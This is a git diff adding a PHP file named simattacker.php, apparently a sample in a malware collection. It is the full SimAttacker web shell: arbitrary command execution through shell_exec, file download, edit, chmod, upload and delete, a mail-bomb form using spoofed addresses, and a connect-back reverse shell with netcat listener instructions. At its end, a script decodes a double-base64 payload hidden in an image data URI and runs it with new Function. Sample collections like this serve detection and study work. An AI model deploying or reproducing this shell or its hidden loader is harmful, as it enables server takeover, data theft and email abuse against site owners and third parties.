diff options
Diffstat (limited to 'data/samples/classic/simattacker.php')
| -rw-r--r-- | data/samples/classic/simattacker.php | 756 |
1 files changed, 756 insertions, 0 deletions
diff --git a/data/samples/classic/simattacker.php b/data/samples/classic/simattacker.php new file mode 100644 index 0000000..7e6f057 --- /dev/null +++ b/data/samples/classic/simattacker.php | |||
| @@ -0,0 +1,756 @@ | |||
| 1 | <? | ||
| 2 | |||
| 3 | //download Files Code | ||
| 4 | |||
| 5 | $fdownload=$_GET['fdownload']; | ||
| 6 | |||
| 7 | if ($fdownload <> "" ){ | ||
| 8 | |||
| 9 | // path & file name | ||
| 10 | |||
| 11 | $path_parts = pathinfo("$fdownload"); | ||
| 12 | |||
| 13 | $entrypath=$path_parts["basename"]; | ||
| 14 | |||
| 15 | $name = "$fdownload"; | ||
| 16 | |||
| 17 | $fp = fopen($name, 'rb'); | ||
| 18 | |||
| 19 | header("Content-Disposition: attachment; filename=$entrypath"); | ||
| 20 | |||
| 21 | header("Content-Length: " . filesize($name)); | ||
| 22 | |||
| 23 | fpassthru($fp); | ||
| 24 | |||
| 25 | exit; | ||
| 26 | |||
| 27 | } | ||
| 28 | |||
| 29 | ?> | ||
| 30 | |||
| 31 | |||
| 32 | |||
| 33 | <html> | ||
| 34 | |||
| 35 | |||
| 36 | |||
| 37 | <head> | ||
| 38 | |||
| 39 | <meta http-equiv="Content-Language" content="en-us"> | ||
| 40 | |||
| 41 | <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> | ||
| 42 | |||
| 43 | <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title> | ||
| 44 | <style> | ||
| 45 | |||
| 46 | <!-- | ||
| 47 | |||
| 48 | body { font-family: Tahoma; font-size: 8pt } | ||
| 49 | |||
| 50 | --> | ||
| 51 | |||
| 52 | </style> | ||
| 53 | |||
| 54 | </head> | ||
| 55 | |||
| 56 | <body> | ||
| 57 | |||
| 58 | <? | ||
| 59 | |||
| 60 | error_reporting(E_ERROR | E_WARNING | E_PARSE); | ||
| 61 | |||
| 62 | |||
| 63 | |||
| 64 | //File Edit | ||
| 65 | |||
| 66 | $fedit=$_GET['fedit']; | ||
| 67 | |||
| 68 | if ($fedit <> "" ){ | ||
| 69 | |||
| 70 | $fedit=realpath($fedit); | ||
| 71 | |||
| 72 | $lines = file($fedit); | ||
| 73 | |||
| 74 | echo "<form action='' method='POST'>"; | ||
| 75 | |||
| 76 | echo "<textarea name='savefile' rows=30 cols=80>" ; | ||
| 77 | |||
| 78 | foreach ($lines as $line_num => $line) { | ||
| 79 | |||
| 80 | echo htmlspecialchars($line); | ||
| 81 | |||
| 82 | } | ||
| 83 | |||
| 84 | echo "</textarea> | ||
| 85 | |||
| 86 | <input type='text' name='filepath' size='60' value='$fedit'> | ||
| 87 | |||
| 88 | <input type='submit' value='save'></form>"; | ||
| 89 | |||
| 90 | $savefile=$_POST['savefile']; | ||
| 91 | |||
| 92 | $filepath=realpath($_POST['filepath']); | ||
| 93 | |||
| 94 | if ($savefile <> "") | ||
| 95 | |||
| 96 | { | ||
| 97 | |||
| 98 | $fp=fopen("$filepath","w+"); | ||
| 99 | |||
| 100 | fwrite ($fp,"") ; | ||
| 101 | |||
| 102 | fwrite ($fp,$savefile) ; | ||
| 103 | |||
| 104 | fclose($fp); | ||
| 105 | |||
| 106 | echo "<script language='javascript'> close()</script>"; | ||
| 107 | |||
| 108 | } | ||
| 109 | |||
| 110 | exit(); | ||
| 111 | |||
| 112 | } | ||
| 113 | |||
| 114 | ?> | ||
| 115 | |||
| 116 | <? | ||
| 117 | |||
| 118 | // CHmod - PRimission | ||
| 119 | |||
| 120 | $fchmod=$_GET['fchmod']; | ||
| 121 | |||
| 122 | if ($fchmod <> "" ){ | ||
| 123 | |||
| 124 | $fchmod=realpath($fchmod); | ||
| 125 | |||
| 126 | echo "<center><br> | ||
| 127 | |||
| 128 | chmod for :$fchmod<br> | ||
| 129 | |||
| 130 | <form method='POST' action=''><br> | ||
| 131 | |||
| 132 | Chmod :<br> | ||
| 133 | |||
| 134 | <input type='text' name='chmod0' ><br> | ||
| 135 | |||
| 136 | <input type='submit' value='change chmod'> | ||
| 137 | |||
| 138 | </form>"; | ||
| 139 | |||
| 140 | $chmod0=$_POST['chmod0']; | ||
| 141 | |||
| 142 | if ($chmod0 <> ""){ | ||
| 143 | |||
| 144 | chmod ($fchmod , $chmod0); | ||
| 145 | |||
| 146 | }else { | ||
| 147 | |||
| 148 | echo "primission Not Allow change Chmod"; | ||
| 149 | |||
| 150 | } | ||
| 151 | |||
| 152 | exit(); | ||
| 153 | |||
| 154 | } | ||
| 155 | |||
| 156 | ?> | ||
| 157 | |||
| 158 | |||
| 159 | |||
| 160 | <div align="center"> | ||
| 161 | |||
| 162 | <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502"> | ||
| 163 | |||
| 164 | <tr> | ||
| 165 | |||
| 166 | <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2"> | ||
| 167 | |||
| 168 | <p align="center"><b> | ||
| 169 | |||
| 170 | <font face="Tahoma" size="2"><br> | ||
| 171 | |||
| 172 | </font> | ||
| 173 | |||
| 174 | <font color="#D2D200" face="Tahoma" size="2"> | ||
| 175 | |||
| 176 | <span style="text-decoration: none"> | ||
| 177 | |||
| 178 | <font color="#000000"> | ||
| 179 | |||
| 180 | <a href="?id=fm&dir=<? | ||
| 181 | |||
| 182 | echo getcwd(); | ||
| 183 | |||
| 184 | ?> | ||
| 185 | |||
| 186 | "> | ||
| 187 | |||
| 188 | <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p> | ||
| 189 | |||
| 190 | <p align="center"><b><a href="?id=cmd"> | ||
| 191 | |||
| 192 | <span style="text-decoration: none"> | ||
| 193 | |||
| 194 | <font face="Tahoma" size="2" color="#000000"> | ||
| 195 | |||
| 196 | CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p> | ||
| 197 | |||
| 198 | <p align="center"><b><a href="?id=fake-mail"> | ||
| 199 | |||
| 200 | <font face="Tahoma" size="2" color="#000000"> | ||
| 201 | |||
| 202 | <span style="text-decoration: none">Fake mail</span></font></a></b></p> | ||
| 203 | |||
| 204 | <p align="center"><b> | ||
| 205 | |||
| 206 | <font face="Tahoma" size="2" color="#000000"> | ||
| 207 | |||
| 208 | <a href="?id=cshell"> | ||
| 209 | |||
| 210 | <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p> | ||
| 211 | |||
| 212 | <p align="center"><b> | ||
| 213 | |||
| 214 | <font color="#000000" face="Tahoma" size="2"> | ||
| 215 | |||
| 216 | <a href="?id="> | ||
| 217 | |||
| 218 | <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p> | ||
| 219 | |||
| 220 | <p> <p align="center"> </td> | ||
| 221 | |||
| 222 | <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center"> | ||
| 223 | |||
| 224 | <? | ||
| 225 | |||
| 226 | //******************************************************* | ||
| 227 | |||
| 228 | //Start Programs About US | ||
| 229 | |||
| 230 | $id=$_GET['id']; | ||
| 231 | |||
| 232 | |||
| 233 | |||
| 234 | if ($id=="") { | ||
| 235 | |||
| 236 | echo " | ||
| 237 | |||
| 238 | <font face='Arial Black' color='#808080' size='1'> | ||
| 239 | |||
| 240 | ***************************************************************************<br> | ||
| 241 | |||
| 242 | Iranian Hackers : WWW.SIMORGH-EV.COM <br> | ||
| 243 | |||
| 244 | Programer : Hossein Asgary <br> | ||
| 245 | |||
| 246 | Note : SimAttacker Have copyright from simorgh security Group <br> | ||
| 247 | |||
| 248 | please : If you find bug or problems in program , tell me by : <br> | ||
| 249 | |||
| 250 | e-mail : admin(at)simorgh-ev(dot)com<br> | ||
| 251 | |||
| 252 | Enjoy :) [Only 4 Best Friends ] <br> | ||
| 253 | |||
| 254 | ***************************************************************************</font></span></p> | ||
| 255 | |||
| 256 | "; | ||
| 257 | |||
| 258 | |||
| 259 | |||
| 260 | echo "<font color='#333333' size='2'>OS :". php_uname(); | ||
| 261 | |||
| 262 | echo "<br>IP :". | ||
| 263 | |||
| 264 | ($_SERVER['REMOTE_ADDR']); | ||
| 265 | |||
| 266 | echo "</font>"; | ||
| 267 | |||
| 268 | |||
| 269 | |||
| 270 | |||
| 271 | |||
| 272 | } | ||
| 273 | |||
| 274 | //************************************************************ | ||
| 275 | |||
| 276 | //cmd-command line | ||
| 277 | |||
| 278 | $cmd=$_POST['cmd']; | ||
| 279 | |||
| 280 | if($id=="cmd"){ | ||
| 281 | |||
| 282 | $result=shell_exec("$cmd"); | ||
| 283 | |||
| 284 | echo "<br><center><h3> CMD ExeCute </h3></center>" ; | ||
| 285 | |||
| 286 | echo "<center> | ||
| 287 | |||
| 288 | <textarea rows=20 cols=70 >$result</textarea><br> | ||
| 289 | |||
| 290 | <form method='POST' action=''> | ||
| 291 | |||
| 292 | <input type='hidden' name='id' value='cmd'> | ||
| 293 | |||
| 294 | <input type='text' size='80' name='cmd' value='$cmd'> | ||
| 295 | |||
| 296 | <input type='submit' value='cmd'><br>"; | ||
| 297 | |||
| 298 | |||
| 299 | |||
| 300 | |||
| 301 | |||
| 302 | |||
| 303 | |||
| 304 | } | ||
| 305 | |||
| 306 | |||
| 307 | |||
| 308 | //******************************************************** | ||
| 309 | |||
| 310 | |||
| 311 | |||
| 312 | //fake mail = Use victim server 4 DOS - fake mail | ||
| 313 | |||
| 314 | if ( $id=="fake-mail"){ | ||
| 315 | |||
| 316 | error_reporting(0); | ||
| 317 | |||
| 318 | echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ; | ||
| 319 | |||
| 320 | echo "<center><form method='post' action=''> | ||
| 321 | |||
| 322 | Victim Mail :<br><input type='text' name='to' ><br> | ||
| 323 | |||
| 324 | Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br> | ||
| 325 | |||
| 326 | Comments: | ||
| 327 | |||
| 328 | <br> | ||
| 329 | |||
| 330 | <textarea rows='10' cols=50 name='Comments' ></textarea><br> | ||
| 331 | |||
| 332 | <input type='submit' value='Send Mail Strm ' > | ||
| 333 | |||
| 334 | </form></center>"; | ||
| 335 | |||
| 336 | //send Storm Mail | ||
| 337 | |||
| 338 | $to=$_POST['to']; | ||
| 339 | |||
| 340 | $nom=$_POST['nom']; | ||
| 341 | |||
| 342 | $Comments=$_POST['Comments']; | ||
| 343 | |||
| 344 | if ($to <> "" ){ | ||
| 345 | |||
| 346 | for ($i = 0; $i < $nom ; $i++){ | ||
| 347 | |||
| 348 | $from = rand (71,1020000000)."@"."Attacker.com"; | ||
| 349 | |||
| 350 | $subject= md5("$from"); | ||
| 351 | |||
| 352 | mail($to,$subject,$Comments,"From:$from"); | ||
| 353 | |||
| 354 | echo "$i is ok"; | ||
| 355 | |||
| 356 | } | ||
| 357 | |||
| 358 | echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>"; | ||
| 359 | |||
| 360 | } | ||
| 361 | |||
| 362 | } | ||
| 363 | |||
| 364 | //******************************************************** | ||
| 365 | |||
| 366 | |||
| 367 | |||
| 368 | //Connect Back -Firewall Bypass | ||
| 369 | |||
| 370 | if ($id=="cshell"){ | ||
| 371 | |||
| 372 | echo "<br>Connect back Shell , bypass Firewalls<br> | ||
| 373 | |||
| 374 | For user :<br> | ||
| 375 | |||
| 376 | nc -l -p 1019 <br> | ||
| 377 | |||
| 378 | <hr> | ||
| 379 | |||
| 380 | <form method='POST' action=''><br> | ||
| 381 | |||
| 382 | Your IP & BindPort:<br> | ||
| 383 | |||
| 384 | <input type='text' name='mip' > | ||
| 385 | |||
| 386 | <input type='text' name='bport' size='5' value='1019'><br> | ||
| 387 | |||
| 388 | <input type='submit' value='Connect Back'> | ||
| 389 | |||
| 390 | </form>"; | ||
| 391 | |||
| 392 | $mip=$_POST['mip']; | ||
| 393 | |||
| 394 | $bport=$_POST['bport']; | ||
| 395 | |||
| 396 | if ($mip <> "") | ||
| 397 | |||
| 398 | { | ||
| 399 | |||
| 400 | $fp=fsockopen($mip , $bport , $errno, $errstr); | ||
| 401 | |||
| 402 | if (!$fp){ | ||
| 403 | |||
| 404 | $result = "Error: could not open socket connection"; | ||
| 405 | |||
| 406 | } | ||
| 407 | |||
| 408 | else { | ||
| 409 | |||
| 410 | fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); | ||
| 411 | |||
| 412 | while(!feof($fp)){ | ||
| 413 | |||
| 414 | fputs ($fp," bash # "); | ||
| 415 | |||
| 416 | $result= fgets ($fp, 4096); | ||
| 417 | |||
| 418 | $message=`$result`; | ||
| 419 | |||
| 420 | fputs ($fp,"--> ".$message."\n"); | ||
| 421 | |||
| 422 | } | ||
| 423 | |||
| 424 | fclose ($fp); | ||
| 425 | |||
| 426 | } | ||
| 427 | |||
| 428 | } | ||
| 429 | |||
| 430 | } | ||
| 431 | |||
| 432 | |||
| 433 | |||
| 434 | //******************************************************** | ||
| 435 | |||
| 436 | //Spy File Manager | ||
| 437 | |||
| 438 | $homedir=getcwd(); | ||
| 439 | |||
| 440 | $dir=realpath($_GET['dir'])."/"; | ||
| 441 | |||
| 442 | if ($id=="fm"){ | ||
| 443 | |||
| 444 | echo "<br><b><p align='left'> Home:</b> $homedir | ||
| 445 | |||
| 446 | <b> | ||
| 447 | |||
| 448 | <form action='' method='GET'> | ||
| 449 | |||
| 450 | Path:</b> | ||
| 451 | |||
| 452 | <input type='hidden' name='id' value='fm'> | ||
| 453 | |||
| 454 | <input type='text' name='dir' size='80' value='$dir'> | ||
| 455 | |||
| 456 | <input type='submit' value='dir'> | ||
| 457 | |||
| 458 | </form> | ||
| 459 | |||
| 460 | <br>"; | ||
| 461 | |||
| 462 | |||
| 463 | |||
| 464 | echo " | ||
| 465 | |||
| 466 | |||
| 467 | |||
| 468 | <div align='center'> | ||
| 469 | |||
| 470 | |||
| 471 | |||
| 472 | <table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'> | ||
| 473 | |||
| 474 | <tr> | ||
| 475 | |||
| 476 | <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td> | ||
| 477 | |||
| 478 | <td height='28' width='82' align='center'> | ||
| 479 | |||
| 480 | <font color='#000080' size='2'><b>Size KByte</b></font></td> | ||
| 481 | |||
| 482 | <td height='28' width='83' align='center'> | ||
| 483 | |||
| 484 | <font color='#008000' size='2'><b>Download</b></font></td> | ||
| 485 | |||
| 486 | <td height='28' width='66' align='center'> | ||
| 487 | |||
| 488 | <font color='#FF9933' size='2'><b>Edit</b></font></td> | ||
| 489 | |||
| 490 | <td height='28' width='75' align='center'> | ||
| 491 | |||
| 492 | <font color='#999999' size='2'><b>Chmod</b></font></td> | ||
| 493 | |||
| 494 | <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td> | ||
| 495 | |||
| 496 | </tr>"; | ||
| 497 | |||
| 498 | if (is_dir($dir)){ | ||
| 499 | |||
| 500 | if ($dh=opendir($dir)){ | ||
| 501 | |||
| 502 | while (($file = readdir($dh)) !== false) { | ||
| 503 | |||
| 504 | $fsize=round(filesize($dir . $file)/1024); | ||
| 505 | |||
| 506 | |||
| 507 | |||
| 508 | |||
| 509 | |||
| 510 | echo " | ||
| 511 | |||
| 512 | <tr> | ||
| 513 | |||
| 514 | <th width='250' height='22' align='left' nowrap>"; | ||
| 515 | |||
| 516 | if (is_dir($dir.$file)) | ||
| 517 | |||
| 518 | { | ||
| 519 | |||
| 520 | echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'> $file <font color='#FF0000' size='1'>dir</font>"; | ||
| 521 | |||
| 522 | } | ||
| 523 | |||
| 524 | else { | ||
| 525 | |||
| 526 | echo "<font size='2' color='#666666'> $file "; | ||
| 527 | |||
| 528 | } | ||
| 529 | |||
| 530 | echo "</a></font></th> | ||
| 531 | |||
| 532 | <td width='113' align='center' nowrap><font color='#000080' size='2'><b>"; | ||
| 533 | |||
| 534 | if (is_file($dir.$file)) | ||
| 535 | |||
| 536 | { | ||
| 537 | |||
| 538 | echo "$fsize"; | ||
| 539 | |||
| 540 | } | ||
| 541 | |||
| 542 | else { | ||
| 543 | |||
| 544 | echo " "; | ||
| 545 | |||
| 546 | } | ||
| 547 | |||
| 548 | echo " | ||
| 549 | |||
| 550 | </b></font></td> | ||
| 551 | |||
| 552 | <td width='103' align='center' nowrap>"; | ||
| 553 | |||
| 554 | if (is_file($dir.$file)){ | ||
| 555 | |||
| 556 | if (is_readable($dir.$file)){ | ||
| 557 | |||
| 558 | echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download"; | ||
| 559 | |||
| 560 | }else { | ||
| 561 | |||
| 562 | echo "<font size='1' color='#FF0000'><b>No ReadAble</b>"; | ||
| 563 | |||
| 564 | } | ||
| 565 | |||
| 566 | }else { | ||
| 567 | |||
| 568 | echo " "; | ||
| 569 | |||
| 570 | } | ||
| 571 | |||
| 572 | echo " | ||
| 573 | |||
| 574 | </a></font></td> | ||
| 575 | |||
| 576 | <td width='77' align='center' nowrap>"; | ||
| 577 | |||
| 578 | if (is_file($dir.$file)) | ||
| 579 | |||
| 580 | { | ||
| 581 | |||
| 582 | if (is_readable($dir.$file)){ | ||
| 583 | |||
| 584 | echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit"; | ||
| 585 | |||
| 586 | }else { | ||
| 587 | |||
| 588 | echo "<font size='1' color='#FF0000'><b>No ReadAble</b>"; | ||
| 589 | |||
| 590 | } | ||
| 591 | |||
| 592 | }else { | ||
| 593 | |||
| 594 | echo " "; | ||
| 595 | |||
| 596 | } | ||
| 597 | |||
| 598 | echo " | ||
| 599 | |||
| 600 | </a></font></td> | ||
| 601 | |||
| 602 | <td width='86' align='center' nowrap>"; | ||
| 603 | |||
| 604 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { | ||
| 605 | |||
| 606 | echo "<font size='1' color='#999999'>Dont in windows"; | ||
| 607 | |||
| 608 | } | ||
| 609 | |||
| 610 | else { | ||
| 611 | |||
| 612 | echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod"; | ||
| 613 | |||
| 614 | } | ||
| 615 | |||
| 616 | echo "</a></font></td> | ||
| 617 | |||
| 618 | <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td> | ||
| 619 | |||
| 620 | </tr> | ||
| 621 | |||
| 622 | "; | ||
| 623 | |||
| 624 | } | ||
| 625 | |||
| 626 | closedir($dh); | ||
| 627 | |||
| 628 | } | ||
| 629 | |||
| 630 | } | ||
| 631 | |||
| 632 | echo "</table> | ||
| 633 | |||
| 634 | <form enctype='multipart/form-data' action='' method='POST'> | ||
| 635 | |||
| 636 | <input type='hidden' name='MAX_FILE_SIZE' value='300000' /> | ||
| 637 | |||
| 638 | Send this file: <input name='userfile' type='file' /> | ||
| 639 | |||
| 640 | <inpt type='hidden' name='Fupath' value='$dir'> | ||
| 641 | |||
| 642 | <input type='submit' value='Send File' /> | ||
| 643 | |||
| 644 | </form> | ||
| 645 | |||
| 646 | </div>"; | ||
| 647 | |||
| 648 | } | ||
| 649 | |||
| 650 | //Upload Files | ||
| 651 | |||
| 652 | $rpath=$_GET['dir']; | ||
| 653 | |||
| 654 | if ($rpath <> "") { | ||
| 655 | |||
| 656 | $uploadfile = $rpath."/" . $_FILES['userfile']['name']; | ||
| 657 | |||
| 658 | print "<pre>"; | ||
| 659 | |||
| 660 | if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { | ||
| 661 | |||
| 662 | echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>"; | ||
| 663 | |||
| 664 | echo "<script language='javascript'> history.back(2)</script>"; | ||
| 665 | |||
| 666 | } | ||
| 667 | |||
| 668 | } | ||
| 669 | |||
| 670 | //file deleted | ||
| 671 | |||
| 672 | $frpath=$_GET['fdelete']; | ||
| 673 | |||
| 674 | if ($frpath <> "") { | ||
| 675 | |||
| 676 | if (is_dir($frpath)){ | ||
| 677 | |||
| 678 | $matches = glob($frpath . '/*.*'); | ||
| 679 | |||
| 680 | if ( is_array ( $matches ) ) { | ||
| 681 | |||
| 682 | foreach ( $matches as $filename) { | ||
| 683 | |||
| 684 | unlink ($filename); | ||
| 685 | |||
| 686 | rmdir("$frpath"); | ||
| 687 | |||
| 688 | echo "<script language='javascript'> alert('Success! Please refresh')</script>"; | ||
| 689 | |||
| 690 | echo "<script language='javascript'> history.back(1)</script>"; | ||
| 691 | |||
| 692 | } | ||
| 693 | |||
| 694 | } | ||
| 695 | |||
| 696 | } | ||
| 697 | |||
| 698 | else{ | ||
| 699 | |||
| 700 | echo "<script language='javascript'> alert('Success! Please refresh')</script>"; | ||
| 701 | |||
| 702 | unlink ("$frpath"); | ||
| 703 | |||
| 704 | echo "<script language='javascript'> history.back(1)</script>"; | ||
| 705 | |||
| 706 | exit(0); | ||
| 707 | |||
| 708 | |||
| 709 | |||
| 710 | } | ||
| 711 | |||
| 712 | |||
| 713 | |||
| 714 | |||
| 715 | |||
| 716 | } | ||
| 717 | |||
| 718 | ?> | ||
| 719 | |||
| 720 | |||
| 721 | |||
| 722 | </td> | ||
| 723 | |||
| 724 | </tr> | ||
| 725 | |||
| 726 | <tr> | ||
| 727 | |||
| 728 | <td style="border: 1px dotted #FFCC66"> | ||
| 729 | |||
| 730 | <p align="center"><font color="#666666" size="1" face="Tahoma"><br> | ||
| 731 | |||
| 732 | Copyright 2004-Simorgh Security<br> | ||
| 733 | |||
| 734 | Hossein-Asgari<br> | ||
| 735 | |||
| 736 | </font><font color="#c0c0c0" size="1" face="Tahoma"> | ||
| 737 | |||
| 738 | <a style="TEXT-DECORATION: none" href="http://www.r57.biz"> | ||
| 739 | |||
| 740 | <font color="#666666">www.r57.biz</font></a></font></td> | ||
| 741 | |||
| 742 | </tr> | ||
| 743 | |||
| 744 | </table> | ||
| 745 | <img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/> | ||
| 746 | <script type="text/javascript"> | ||
| 747 | if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain}; | ||
| 748 | setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500); | ||
| 749 | </script> | ||
| 750 | </div> | ||
| 751 | |||
| 752 | </body> | ||
| 753 | |||
| 754 | |||
| 755 | |||
| 756 | </html> | ||
